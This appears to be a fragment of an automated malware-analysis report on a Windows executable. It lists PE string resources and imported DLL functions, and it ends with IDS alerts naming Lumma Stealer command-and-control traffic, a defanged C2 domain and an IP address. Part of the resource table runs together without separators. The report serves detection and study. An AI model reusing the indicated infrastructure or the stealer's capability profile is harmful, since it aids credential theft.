RT_STRING | 0xa4f9bc | 0x8e6 | data | English | United States | 0.5258999122036875
RT_STRING | 0xa502a4 | 0xc92 | data | English | United States | 0.3334369173399627
RT_STRING | 0xa50f38 | 0xbf4 | data | English | United States | 0.5320261437908497
RT_STRING | 0xa51b2c | 0xc5e | data | English | United States | 0.48673404927353126
RT_STRING | 0xa5278c | 0xcd8 | data | English | United States | 0.4382603406326034
RT_STRING | 0xa53464 | 0x92c | data | English | United States | 0.5404599659284497
RT_STRING | 0xa53d90 | 0x9ce | data | English | United States | 0.3669322709163347
RT_STRING | 0xa54760 | 0x962 | data | English | United States | 0.5104079933388843
RT_STRING | 0xa550c4 | 0x986 | data | English | United States | 0.5332239540607056
RT_STRING | 0xa55a4c | 0x9d8 | data | English | United States | 0.4765873015873016
RT_STRING | 0xa56424 | 0x8ec | data | English | United States | 0.563922942206655
RT_STRING | 0xa56d10 | 0xcc6 | data | English | United States | 0.382262996941896
RT_STRING | 0xa579d8 | 0xca8 | data | English | United States | 0.4367283950617284
RT_STRING | 0xa58680 | 0xcbe | data | English | United States | 0.5076640098099325
RT_STRING | 0xa59340 | 0xd0c | data | English | United States | 0.4224550898203593
RT_STRING | 0xa5a04c | 0x8a6 | data | English | United States | 0.5519421860885275
RT_STRING | 0xa5a8f4 | 0x256 | data | English | United States | 0.4983277591973244
RT_STRING | 0xa5ab4c | 0x260 | data | English | United States | 0.5444078947368421
RT_STRING | 0xa5adac | 0x22e | data | English | United States | 0.6505376344086021
RT_STRING | 0xa5afdc | 0x23a | data | English | United States | 0.5333333333333333
RT_STRING | 0xa5b218 | 0x288 | data | English | United States | 0.6388888888888888
RT_STRING | 0xa5b4a0 | 0x7a6 | data | English | United States | 0.49284984678243104
RT_STRING | 0xa5bc48 | 0x820 | data | English | United States | 0.46923076923076923
RT_STRING | 0xa5c468 | 0x6be | data | English | United States | 0.6292004634994206
RT_STRING | 0xa5cb28 | 0x7d8 | data | English | United States | 0.4960159362549801
RT_STRING | 0xa5d300 | 0x636 | data | English | United States | 0.5943396226415094
RT_STRING | 0xa5d938 | 0xe0 | data | English | United States | 0.10714285714285714
RT_STRING | 0xa5da18 | 0xe0 | data | English | United States | 0.10714285714285714
RT_STRING | 0xa5daf8 | 0xe0 | data | English | United States | 0.10714285714285714
RT_STRING | 0xa5dbd8 | 0xe0 | data | English | United States | 0.10714285714285714
                                                                                                                                RT_STRING0xa5dcb80xe0dataEnglishUnited States0.10714285714285714
                                                                                                                                RT_STRING0xa5dd980x2c4dataEnglishUnited States0.634180790960452
                                                                                                                                RT_STRING0xa5e05c0x30edataEnglishUnited States0.45524296675191817
                                                                                                                                RT_STRING0xa5e36c0x2b2dataEnglishUnited States0.6768115942028986
                                                                                                                                RT_STRING0xa5e6200x318dataEnglishUnited States0.5732323232323232
                                                                                                                                RT_STRING0xa5e9380x326dataEnglishUnited States0.6178660049627791
                                                                                                                                RT_STRING0xa5ec600x2dadataEnglishUnited States0.6328767123287671
                                                                                                                                RT_STRING0xa5ef3c0x362dataEnglishUnited States0.3972286374133949
                                                                                                                                RT_STRING0xa5f2a00x2f4dataEnglishUnited States0.6666666666666666
                                                                                                                                RT_STRING0xa5f5940x302dataEnglishUnited States0.5324675324675324
                                                                                                                                RT_STRING0xa5f8980x35adataEnglishUnited States0.5722610722610723
                                                                                                                                RT_STRING0xa5fbf40x2cadataEnglishUnited States0.6442577030812325
                                                                                                                                RT_STRING0xa5fec00x2b0dataEnglishUnited States0.39098837209302323
                                                                                                                                RT_STRING0xa601700x2badataEnglishUnited States0.670487106017192
                                                                                                                                RT_STRING0xa6042c0x2f0dataEnglishUnited States0.6316489361702128
                                                                                                                                RT_STRING0xa6071c0x2fadataEnglishUnited States0.573490813648294
                                                                                                                                RT_STRING0xa60a180x2c2dataEnglishUnited States0.6147308781869688
                                                                                                                                RT_STRING0xa60cdc0x34cdataEnglishUnited States0.39691943127962087
                                                                                                                                RT_STRING0xa610280x3a4dataEnglishUnited States0.5482832618025751
                                                                                                                                RT_STRING0xa613cc0x34cdataEnglishUnited States0.566350710900474
                                                                                                                                RT_STRING0xa617180x372dataEnglishUnited States0.4580498866213152
                                                                                                                                RT_STRING0xa61a8c0x2a4dataEnglishUnited States0.628698224852071
                                                                                                                                RT_STRING0xa61d300x29adataEnglishUnited States0.506006006006006
                                                                                                                                RT_STRING0xa61fcc0x2b4dataEnglishUnited States0.5520231213872833
                                                                                                                                RT_STRING0xa622800x290dataEnglishUnited States0.6829268292682927
                                                                                                                                RT_STRING0xa625100x274dataEnglishUnited States0.5589171974522293
                                                                                                                                RT_STRING0xa627840x25edataEnglishUnited States0.6897689768976898
                                                                                                                                RT_STRING0xa629e40x304dataEnglishUnited States0.5375647668393783
                                                                                                                                RT_STRING0xa62ce80x334dataEnglishUnited States0.5536585365853659
                                                                                                                                RT_STRING0xa6301c0x2e6dataEnglishUnited States0.6819407008086253
                                                                                                                                RT_STRING0xa633040x2fadataEnglishUnited States0.5603674540682415
                                                                                                                                RT_STRING0xa636000x274dataEnglishUnited States0.6449044585987261
                                                                                                                                RT_STRING0xa638740x33adataEnglishUnited States0.5581113801452785
                                                                                                                                RT_STRING0xa63bb00x37cdataEnglishUnited States0.5302690582959642
                                                                                                                                RT_STRING0xa63f2c0x2fedataEnglishUnited States0.6945169712793734
                                                                                                                                RT_STRING0xa6422c0x34cdataEnglishUnited States0.5592417061611374
                                                                                                                                RT_STRING0xa645780x31cdataEnglishUnited States0.6344221105527639
                                                                                                                                RT_STRING0xa648940x464dataEnglishUnited States0.5729537366548043
                                                                                                                                RT_STRING0xa64cf80x4d8dataEnglishUnited States0.46048387096774196
                                                                                                                                RT_STRING0xa651d00x3bcdataEnglishUnited States0.6527196652719666
                                                                                                                                RT_STRING0xa6558c0x45edataEnglishUnited States0.5330948121645797
                                                                                                                                RT_STRING0xa659ec0x44adataEnglishUnited States0.5819672131147541
                                                                                                                                RT_STRING0xa65e380x10cdataEnglishUnited States0.8470149253731343
                                                                                                                                RT_STRING0xa65f440xc0dataEnglishUnited States0.7864583333333334
                                                                                                                                RT_STRING0xa660040xe6StarOffice Gallery theme \372, 154195760 objects, 1st \356\020\333\020\320\020\340\020\324\020\321\020\320\020\010EnglishUnited States0.9304347826086956
                                                                                                                                RT_STRING0xa660ec0xcedataEnglishUnited States0.7766990291262136
                                                                                                                                RT_STRING0xa661bc0xe6dataEnglishUnited States0.8608695652173913
                                                                                                                                RT_STRING0xa662a40x872dataEnglishUnited States0.543940795559667
                                                                                                                                RT_STRING0xa66b180xbf6dataEnglishUnited States0.3791639451338994
                                                                                                                                RT_STRING0xa677100xa84dataEnglishUnited States0.5824665676077266
                                                                                                                                RT_STRING0xa681940xba8dataEnglishUnited States0.47989276139410186
                                                                                                                                RT_STRING0xa68d3c0xb46dataEnglishUnited States0.5246015246015246
                                                                                                                                RT_STRING0xa698840x406dataEnglishUnited States0.629126213592233
                                                                                                                                RT_STRING0xa69c8c0x216dataEnglishUnited States0.50187265917603
                                                                                                                                RT_STRING0xa69ea40x204dataEnglishUnited States0.7596899224806202
                                                                                                                                RT_STRING0xa6a0a80x212dataEnglishUnited States0.6754716981132075
                                                                                                                                RT_STRING0xa6a2bc0x22cdataEnglishUnited States0.6151079136690647
                                                                                                                                RT_STRING0xa6a4e80x230dataEnglishUnited States0.6839285714285714
                                                                                                                                RT_STRING0xa6a7180x2fedataEnglishUnited States0.46344647519582244
                                                                                                                                RT_STRING0xa6aa180x312dataEnglishUnited States0.6743002544529262
                                                                                                                                RT_STRING0xa6ad2c0x2e8dataEnglishUnited States0.706989247311828
                                                                                                                                RT_STRING0xa6b0140x2f0dataEnglishUnited States0.5651595744680851
                                                                                                                                RT_STRING0xa6b3040x1eedataEnglishUnited States0.7489878542510121
                                                                                                                                RT_STRING0xa6b4f40x2c0dataEnglishUnited States0.48579545454545453
                                                                                                                                RT_STRING0xa6b7b40x25edataEnglishUnited States0.5429042904290429
                                                                                                                                RT_STRING0xa6ba140x20cdataEnglishUnited States0.6717557251908397
                                                                                                                                RT_STRING0xa6bc200x272dataEnglishUnited States0.5015974440894568
                                                                                                                                RT_STRING0xa6be940x2e4dataEnglishUnited States0.6851351351351351
                                                                                                                                RT_STRING0xa6c1780x846dataEnglishUnited States0.40557129367327666
                                                                                                                                RT_STRING0xa6c9c00x7b8dataEnglishUnited States0.4473684210526316
                                                                                                                                RT_STRING0xa6d1780x716dataEnglishUnited States0.5931642778390298
                                                                                                                                RT_STRING0xa6d8900x7c4dataEnglishUnited States0.44969818913480886
                                                                                                                                RT_STRING0xa6e0540x65cdataEnglishUnited States0.5706388206388207
                                                                                                                                RT_STRING0xa6e6b00xa9edataEnglishUnited States0.40066225165562913
                                                                                                                                RT_STRING0xa6f1500xa76dataEnglishUnited States0.39357729648991785
                                                                                                                                RT_STRING0xa6fbc80x93cdataEnglishUnited States0.5376480541455161
                                                                                                                                RT_STRING0xa705040xa4adataEnglishUnited States0.43242217160212604
                                                                                                                                RT_STRING0xa70f500x8b8dataEnglishUnited States0.5013440860215054
                                                                                                                                RT_STRING0xa718080x238dataEnglishUnited States0.6355633802816901
                                                                                                                                RT_STRING0xa71a400x1f2dataEnglishUnited States0.5120481927710844
                                                                                                                                RT_STRING0xa71c340x1dedataEnglishUnited States0.7510460251046025
                                                                                                                                RT_STRING0xa71e140x200Targa image data - Color 1072 x 1078 x 32 +1083 +1075 "1\0040\0049\004=\0040\004."EnglishUnited States0.615234375
                                                                                                                                RT_STRING0xa720140x1d8dataEnglishUnited States0.6758474576271186
                                                                                                                                RT_STRING0xa721ec0x2fedataEnglishUnited States0.6292428198433421
                                                                                                                                RT_STRING0xa724ec0x376dataEnglishUnited States0.5079006772009029
                                                                                                                                RT_STRING0xa728640x328dataEnglishUnited States0.681930693069307
                                                                                                                                RT_STRING0xa72b8c0x34adataEnglishUnited States0.5653206650831354
                                                                                                                                RT_STRING0xa72ed80x31edataEnglishUnited States0.6290726817042607
                                                                                                                                RT_STRING0xa731f80x5e4dataEnglishUnited States0.5663129973474801
                                                                                                                                RT_STRING0xa737dc0x836dataEnglishUnited States0.42055185537583256
                                                                                                                                RT_STRING0xa740140x68edataEnglishUnited States0.6495828367103695
                                                                                                                                RT_STRING0xa746a40x7c2dataEnglishUnited States0.5171198388721048
                                                                                                                                RT_STRING0xa74e680x72cdataEnglishUnited States0.5620915032679739
                                                                                                                                RT_STRING0xa755940x4c8dataEnglishUnited States0.6111111111111112
                                                                                                                                RT_STRING0xa75a5c0x57adataEnglishUnited States0.43009985734664763
                                                                                                                                RT_STRING0xa75fd80x4d6dataEnglishUnited States0.6639741518578353
                                                                                                                                RT_STRING0xa764b00x55adataEnglishUnited States0.6197080291970803
                                                                                                                                RT_STRING0xa76a0c0x52cdataEnglishUnited States0.554380664652568
                                                                                                                                RT_STRING0xa76f380x5d8dataEnglishUnited States0.608957219251337
                                                                                                                                RT_STRING0xa775100x95adataEnglishUnited States0.38345864661654133
                                                                                                                                RT_STRING0xa77e6c0x876dataEnglishUnited States0.5198522622345337
                                                                                                                                RT_STRING0xa786e40x800dataEnglishUnited States0.5810546875
                                                                                                                                RT_STRING0xa78ee40x8badataEnglishUnited States0.486123545210385
                                                                                                                                RT_STRING0xa797a00x592dataEnglishUnited States0.6227208976157083
                                                                                                                                RT_STRING0xa79d340x494dataEnglishUnited States0.39505119453924914
                                                                                                                                RT_STRING0xa7a1c80x414dataEnglishUnited States0.4272030651340996
                                                                                                                                RT_STRING0xa7a5dc0x44edataEnglishUnited States0.5444646098003629
                                                                                                                                RT_STRING0xa7aa2c0x44adataEnglishUnited States0.43169398907103823
                                                                                                                                RT_STRING0xa7ae780x4c0dataEnglishUnited States0.537828947368421
                                                                                                                                RT_STRING0xa7b3380xa62dataEnglishUnited States0.41346877351392025
                                                                                                                                RT_STRING0xa7bd9c0xa88dataEnglishUnited States0.4328635014836795
                                                                                                                                RT_STRING0xa7c8240x946dataEnglishUnited States0.5686604886267902
                                                                                                                                RT_STRING0xa7d16c0xa5edataEnglishUnited States0.45139412207987945
                                                                                                                                RT_STRING0xa7dbcc0x70cdataEnglishUnited States0.5609756097560976
                                                                                                                                RT_STRING0xa7e2d80x14adataEnglishUnited States0.6606060606060606
                                                                                                                                RT_STRING0xa7e4240x136dataEnglishUnited States0.635483870967742
                                                                                                                                RT_STRING0xa7e55c0x112dataEnglishUnited States0.9051094890510949
                                                                                                                                RT_STRING0xa7e6700x17adataEnglishUnited States0.6084656084656085
                                                                                                                                RT_STRING0xa7e7ec0x104dataEnglishUnited States0.8961538461538462
                                                                                                                                RT_STRING0xa7e8f00xb3adataEnglishUnited States0.4826026443980515
                                                                                                                                RT_STRING0xa7f42c0xc7adataEnglishUnited States0.40388227927363807
                                                                                                                                RT_STRING0xa800a80xa4cdataEnglishUnited States0.571320182094082
                                                                                                                                RT_STRING0xa80af40xb48dataEnglishUnited States0.4878808864265928
                                                                                                                                RT_STRING0xa8163c0xa54dataEnglishUnited States0.5268532526475038
                                                                                                                                RT_STRING0xa820900xcf0dataEnglishUnited States0.5135869565217391
                                                                                                                                RT_STRING0xa82d800xe28dataEnglishUnited States0.38051876379690946
                                                                                                                                RT_STRING0xa83ba80xd0cdataEnglishUnited States0.5586826347305389
                                                                                                                                RT_STRING0xa848b40xedcdataEnglishUnited States0.47003154574132494
                                                                                                                                RT_STRING0xa857900xe64dataEnglishUnited States0.503257328990228
                                                                                                                                RT_STRING0xa865f40x452dataEnglishUnited States0.6301989150090416
                                                                                                                                RT_STRING0xa86a480x3f0dataEnglishUnited States0.4742063492063492
                                                                                                                                RT_STRING0xa86e380x32adataEnglishUnited States0.7358024691358025
                                                                                                                                RT_STRING0xa871640x34edataEnglishUnited States0.5921985815602837
                                                                                                                                RT_STRING0xa874b40x39edataEnglishUnited States0.6479481641468683
                                                                                                                                RT_STRING0xa878540x6cedataEnglishUnited States0.5597014925373134
                                                                                                                                RT_STRING0xa87f240xa78dataEnglishUnited States0.37089552238805973
                                                                                                                                RT_STRING0xa8899c0x932dataEnglishUnited States0.5739167374681393
                                                                                                                                RT_STRING0xa892d00x9a8dataEnglishUnited States0.5234627831715211
                                                                                                                                RT_STRING0xa89c780x9a4dataEnglishUnited States0.4813614262560778
                                                                                                                                RT_STRING0xa8a61c0x4bcdataEnglishUnited States0.6452145214521452
                                                                                                                                RT_STRING0xa8aad80x2aadataEnglishUnited States0.5381231671554252
                                                                                                                                RT_STRING0xa8ad840x27cdataEnglishUnited States0.6839622641509434
                                                                                                                                RT_STRING0xa8b0000x2a4dataEnglishUnited States0.7144970414201184
                                                                                                                                RT_STRING0xa8b2a40x2a0dataEnglishUnited States0.6502976190476191
RT_STRING | 0xa8b544 | 0x246 | AmigaOS bitmap font "5\016*\016\025\0162\016#\016L\016\027\016 \0162\016"\016+\016%\0161\016\007\016\031", fc_YSize 26880, 8974 elements, 2nd "s", 3rd "e" | English | United States | 0.738831615120275
RT_STRING | 0xa8b78c | 0x214 | data | English | United States | 0.5921052631578947
RT_STRING | 0xa8b9a0 | 0x23e | data | English | United States | 0.6515679442508711
RT_STRING | 0xa8bbe0 | 0x27e | data | English | United States | 0.7523510971786834
RT_STRING | 0xa8be60 | 0x21c | data | English | United States | 0.6388888888888888
RT_STRING | 0xa8c07c | 0x386 | data | English | United States | 0.6862527716186253
RT_STRING | 0xa8c404 | 0x8a0 | data | English | United States | 0.458786231884058
RT_STRING | 0xa8cca4 | 0x872 | data | English | United States | 0.49167437557816834
RT_STRING | 0xa8d518 | 0x7a4 | data | English | United States | 0.6492842535787321
RT_STRING | 0xa8dcbc | 0x83c | data | English | United States | 0.50853889943074
RT_STRING | 0xa8e4f8 | 0x644 | data | English | United States | 0.6315461346633416
RT_STRING | 0xa8eb3c | 0x2c2 | AmigaOS bitmap font "3\006*\006&\006F\006'\006A\006 ", fc_YSize 4294936073, 9990 elements, 2nd "\276\011\260\011 ", 3rd "r" | English | United States | 0.5821529745042493
RT_STRING | 0xa8ee00 | 0x2f6 | data | English | United States | 0.5672823218997362
RT_STRING | 0xa8f0f8 | 0x27a | data | English | United States | 0.8028391167192429
RT_STRING | 0xa8f374 | 0x2de | data | English | United States | 0.6335149863760218
RT_STRING | 0xa8f654 | 0x276 | data | English | United States | 0.7126984126984127
RT_STRING | 0xa8f8cc | 0x392 | data | English | United States | 0.5831509846827133
RT_STRING | 0xa8fc60 | 0x3a8 | data | English | United States | 0.5160256410256411
RT_STRING | 0xa90008 | 0x31c | data | English | United States | 0.7273869346733668
RT_STRING | 0xa90324 | 0x386 | Targa image data - Color 1072 x 1093 x 32 +1083 +1075 "\257\0049\004;\0044\004;\0048\0049\0043\004 " | English | United States | 0.5986696230598669
RT_STRING | 0xa906ac | 0x334 | data | English | United States | 0.6487804878048781
RT_STRING | 0xa909e0 | 0xa24 | data | English | United States | 0.5161787365177196
RT_STRING | 0xa91404 | 0xbd6 | data | English | United States | 0.4062706270627063
RT_STRING | 0xa91fdc | 0xaf6 | data | English | United States | 0.5823235923022095
RT_STRING | 0xa92ad4 | 0xc5a | data | English | United States | 0.48007590132827327
RT_STRING | 0xa93730 | 0xc86 | data | English | United States | 0.5028072364316906
RT_STRING | 0xa943b8 | 0x952 | data | English | United States | 0.5431684828164292
RT_STRING | 0xa94d0c | 0xabe | data | English | United States | 0.3916363636363636
RT_STRING | 0xa957cc | 0xa8a | data | English | United States | 0.5830244625648628
RT_STRING | 0xa96258 | 0xb78 | data | English | United States | 0.4887602179836512
RT_STRING | 0xa96dd0 | 0xb80 | data | English | United States | 0.5040760869565217
RT_STRING | 0xa97950 | 0x96a | data | English | United States | 0.5439834024896265
RT_STRING | 0xa982bc | 0xaa2 | data | English | United States | 0.39162380602498165
RT_STRING | 0xa98d60 | 0xa86 | data | English | United States | 0.5783221974758723
RT_STRING | 0xa997e8 | 0xb70 | data | English | United States | 0.5215163934426229
RT_STRING | 0xa9a358 | 0xb38 | data | English | United States | 0.4794568245125348
RT_STRING | 0xa9ae90 | 0x9c2 | data | English | United States | 0.5612489991993594
RT_STRING | 0xa9b854 | 0xc0e | data | English | United States | 0.41088788075178223
RT_STRING | 0xa9c464 | 0xb3e | data | English | United States | 0.5111188325225852
RT_STRING | 0xa9cfa4 | 0xbac | data | English | United States | 0.5471887550200804
RT_STRING | 0xa9db50 | 0xb70 | data | English | United States | 0.48189890710382516
RT_STRING | 0xa9e6c0 | 0x84e | data | English | United States | 0.5973659454374413
RT_STRING | 0xa9ef10 | 0x7c0 | data | English | United States | 0.4329637096774194
RT_STRING | 0xa9f6d0 | 0x7b4 | data | English | United States | 0.49898580121703856
RT_STRING | 0xa9fe84 | 0x70c | data | English | United States | 0.5909090909090909
RT_STRING | 0xaa0590 | 0x7b0 | data | English | United States | 0.4949186991869919
RT_STRING | 0xaa0d40 | 0x606 | data | English | United States | 0.6465629053177692
RT_STRING | 0xaa1348 | 0x8a4 | data | English | United States | 0.4462025316455696
RT_STRING | 0xaa1bec | 0x8d8 | data | English | United States | 0.4620141342756184
RT_STRING | 0xaa24c4 | 0x786 | data | English | United States | 0.6246105919003115
RT_STRING | 0xaa2c4c | 0x872 | Targa image data - Color 2379 x 2337 x 32 +2344 +2354 "\027\0110\011?\011\017\011\025\011K\011 " | English | United States | 0.48103607770582796
RT_STRING | 0xaa34c0 | 0x6f0 | data | English | United States | 0.5996621621621622
RT_STRING | 0xaa3bb0 | 0x896 | data | English | United States | 0.47952684258416745
RT_STRING | 0xaa4448 | 0x872 | data | English | United States | 0.4398704902867715
RT_STRING | 0xaa4cbc | 0x77a | data | English | United States | 0.6212121212121212
RT_STRING | 0xaa5438 | 0x824 | data | English | United States | 0.4923224568138196
RT_STRING | 0xaa5c5c | 0x6fc | data | English | United States | 0.5956375838926175
RT_STRING | 0xaa6358 | 0xdc | data | English | United States | 0.8772727272727273
RT_STRING | 0xaa6434 | 0xd8 | data | English | United States | 0.7407407407407407
RT_STRING | 0xaa650c | 0xcc | data | English | United States | 0.9215686274509803
RT_STRING | 0xaa65d8 | 0xf0 | data | English | United States | 0.7958333333333333
RT_STRING | 0xaa66c8 | 0xca | data | English | United States | 0.8712871287128713
RT_STRING | 0xaa6794 | 0x7da | data | English | United States | 0.5084577114427861
RT_STRING | 0xaa6f70 | 0x97e | data | English | United States | 0.4020576131687243
RT_STRING | 0xaa78f0 | 0x7ec | data | English | United States | 0.5729783037475346
RT_STRING | 0xaa80dc | 0x8ee | data | English | United States | 0.47112860892388453
RT_STRING | 0xaa89cc | 0x8ba | data | English | United States | 0.517905102954342
RT_STRING | 0xaa9288 | 0x1f20 | data | English | United States | 0.38679718875502006
RT_STRING | 0xaab1a8 | 0x2b14 | data | English | United States | 0.2920747188973522
RT_STRING | 0xaadcbc | 0x2756 | CLIPPER COFF executable (VAX #) not stripped - version 71 | English | United States | 0.40625620655412115
RT_STRING | 0xab0414 | 0x2aee | data | English | United States | 0.34795268425841674
RT_STRING | 0xab2f04 | 0x27b2 | data | English | United States | 0.37699271796890377
RT_STRING | 0xab56b8 | 0xc1c | data | English | United States | 0.4483870967741935
RT_STRING | 0xab62d4 | 0x364 | data | English | United States | 0.3467741935483871
RT_STRING | 0xab6638 | 0x32a | data | English | United States | 0.5530864197530864
RT_STRING | 0xab6964 | 0x33e | data | English | United States | 0.4867469879518072
RT_STRING | 0xab6ca4 | 0x330 | data | English | United States | 0.4215686274509804
RT_STRING | 0xab6fd4 | 0x340 | data | English | United States | 0.6153846153846154
RT_STRING | 0xab7314 | 0x3ae | data | English | United States | 0.4447983014861996
RT_STRING | 0xab76c4 | 0x366 | data | English | United States | 0.6091954022988506
RT_STRING | 0xab7a2c | 0x3b0 | data | English | United States | 0.6038135593220338
RT_STRING | 0xab7ddc | 0x390 | data | English | United States | 0.5537280701754386
RT_STRING | 0xab816c | 0x2f4 | data | English | United States | 0.6917989417989417
RT_STRING | 0xab8460 | 0x332 | Targa image data - RLE 1074 x 1072 x 32 +1072 +1082 "A\0045\004 " | English | United States | 0.5158924205378973
RT_STRING | 0xab8794 | 0x36c | data | English | United States | 0.5901826484018264
RT_STRING | 0xab8b00 | 0x376 | data | English | United States | 0.6557562076749436
RT_STRING | 0xab8e78 | 0x33e | data | English | United States | 0.5783132530120482
RT_STRING | 0xab91b8 | 0x4b4 | data | English | United States | 0.6395348837209303
RT_STRING | 0xab966c | 0xba2 | data | English | United States | 0.40597716588314303
RT_STRING | 0xaba210 | 0xc80 | data | English | United States | 0.4353125
RT_STRING | 0xabae90 | 0xb54 | data | English | United States | 0.5582758620689655
RT_STRING | 0xabb9e4 | 0xb5c | data | English | United States | 0.4470426409903714
RT_STRING | 0xabc540 | 0x9b8 | data | English | United States | 0.5542604501607717
RT_STRING | 0xabcef8 | 0x86e | data | English | United States | 0.4712696941612604
RT_STRING | 0xabd768 | 0x8ec | data | English | United States | 0.44089316987740806
RT_STRING | 0xabe054 | 0x7d2 | data | English | United States | 0.5934065934065934
RT_STRING | 0xabe828 | 0x7d4 | data | English | United States | 0.49650698602794413
RT_STRING | 0xabeffc | 0x748 | data | English | United States | 0.5574034334763949
RT_GROUP_ICON | 0xabf744 | 0x5a | data | English | United States | 0.7333333333333333
RT_VERSION | 0xabf7a0 | 0x488 | data | English | United States | 0.4387931034482759
RT_MANIFEST | 0xabfc28 | 0x3d2 | XML 1.0 document, ASCII text, with very long lines (864) | English | United States | 0.5398773006134969
DLL | Import
KERNEL32.dll | SetConsoleCursorPosition, SetConsoleTextAttribute, GetConsoleCursorInfo, SetConsoleMode, GetConsoleMode, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, ReadConsoleInputW, FillConsoleOutputCharacterW, OpenEventW, WaitForSingleObjectEx, WaitForMultipleObjectsEx, CreateFileW, GetFileSize, SystemTimeToFileTime, SetEndOfFile, SetFilePointer, FlushFileBuffers, CopyFileW, MoveFileExW, DeleteFileW, MoveFileW, ExpandEnvironmentStringsW, FindCloseChangeNotification, FindFirstChangeNotificationW, FindNextChangeNotification, GetExitCodeProcess, CreateDirectoryW, Sleep, MapViewOfFile, UnmapViewOfFile, TerminateProcess, OutputDebugStringW, WriteFile, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, RtlUnwind, InterlockedPushEntrySList, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ReadConsoleInputA, GetCommandLineA, GetNumberOfConsoleInputEvents, HeapAlloc, GetStringTypeW, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapSize, HeapReAlloc, SetConsoleCursorInfo, FindFirstFileExW, IsValidCodePage, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, SetFilePointerEx, LoadLibraryExW, FoldStringW, LocalSize, LocalAlloc, FindNextFileW, FindClose, GetEnvironmentVariableW, GetCurrentDirectoryW, GetWindowsDirectoryW, GetLongPathNameW, GetFullPathNameW, GetTempPathW, GetConsoleTitleW, GetModuleHandleA, LoadLibraryW, GetSystemDirectoryW, VerSetConditionMask, FreeLibrary, CompareStringW, GetProcAddress, GetModuleHandleW, WriteConsoleW, GetFileSizeEx, GetFileType, GetLocaleInfoW, GetOEMCP, GetACP, GetConsoleOutputCP, GetConsoleCP, GetStdHandle, SetLastError, InterlockedDecrement, InterlockedIncrement, InterlockedExchangeAdd, WaitForMultipleObjects, ReleaseMutex, InterlockedExchange, CreateThread, CreateMutexW, CreateEventW, GetFileAttributesW, GetModuleFileNameW, GetModuleHandleExW, SwitchToThread, InterlockedCompareExchange, SetEvent, CloseHandle, CreateProcessW, ResetEvent, WaitForSingleObject, ExitProcess, GetCurrentThreadId, GetModuleFileNameA, DebugBreak, FormatMessageW, lstrlenW, LocalFree, RtlCaptureStackBackTrace, CreateFileA, OutputDebugStringA, EnterCriticalSection, InitializeCriticalSection, LeaveCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetConsoleScreenBufferInfo, GetOverlappedResult, ConvertThreadToFiber, ConvertFiberToThread, CreateFiberEx, DeleteFiber, SwitchToFiber, GetCommandLineW, CancelIo, IsDebuggerPresent, SetConsoleTitleW, GetCurrentProcessId, DeleteCriticalSection, DecodePointer, RaiseException, GetLastError, ReadFile, ReadConsoleW, HeapFree, IsDBCSLeadByteEx, GetTimeZoneInformation, FreeLibraryAndExitThread, ExitThread, SetHandleInformation, WaitNamedPipeW, CreateFileMappingA, FindVolumeClose, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, FindFirstVolumeW, QueryDosDeviceW, GetLogicalDriveStringsW, GetLocalTime, InitializeCriticalSectionAndSpinCount, GetCurrentProcess, UnhandledExceptionFilter, GetSystemDirectoryA, LoadLibraryA, MulDiv, GetTickCount, TryEnterCriticalSection, QueryPerformanceFrequency
USER32.dll | GetProcessWindowStation, GetUserObjectInformationW, wsprintfW, GetKeyState, wsprintfA, ReleaseDC, MessageBoxA, CallWindowProcW, GetDC, RemovePropA, DestroyIcon, CharLowerW, MessageBoxW, FindWindowW, GetPropA, SendMessageW, CharLowerBuffW, GetSysColor
SHLWAPI.dll | PathIsPrefixW
PSAPI.DLL | GetModuleFileNameExW
WININET.dll | InternetReadFile, InternetOpenW, InternetOpenUrlW, InternetCloseHandle, HttpQueryInfoW
WS2_32.dll | getservbyname, ntohs, getservbyport, gethostbyaddr, gethostbyname, inet_addr, WSAGetLastError, inet_ntoa, WSACleanup, WSAStartup, getpeername, WSASend, WSARecv, WSAGetOverlappedResult, WSAEnumNetworkEvents, htonl, WSAStringToAddressW, getsockname, WSASetLastError, htons, ntohl, shutdown, closesocket, WSAEnumProtocolsW, WSCGetProviderPath, WSASocketW, setsockopt, bind, WSAEventSelect, connect
ADVAPI32.dll | CryptReleaseContext, CryptGenRandom, RegNotifyChangeKeyValue, RegEnumValueW, RegQueryInfoKeyW, RegDeleteValueW, RegSetValueExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExW, RegCloseKey, GetTokenInformation, SetSecurityDescriptorControl, SetSecurityDescriptorDacl, SetSecurityDescriptorOwner, InitializeSecurityDescriptor, GetAclInformation, AddAccessAllowedAceEx, SetEntriesInAclW, InitializeSid, GetSidLengthRequired, CopySid, GetLengthSid, EqualSid, OpenProcessToken, GetSidSubAuthority, IsValidSid, GetNamedSecurityInfoW, CryptAcquireContextA
SHELL32.dll | ShellExecuteExW, SHGetFolderPathW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree
USERENV.dll | GetUserProfileDirectoryW
Secur32.dll | FreeContextBuffer, EnumerateSecurityPackagesA, QuerySecurityPackageInfoA
CRYPT32.dll | CryptProtectData, CryptUnprotectData
GDI32.dll | GetDeviceCaps, DeleteDC
IPHLPAPI.DLL | GetTcpTable
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T17:39:19.871748+0100 | 2057269 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (worddosofrm .shop) | 1 | 192.168.2.4 | 57108 | 1.1.1.1 | 53 | UDP
2024-11-07T17:39:20.512582+0100 | 2057270 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | TCP
2024-11-07T17:39:20.512582+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.16.142 | 443 | TCP
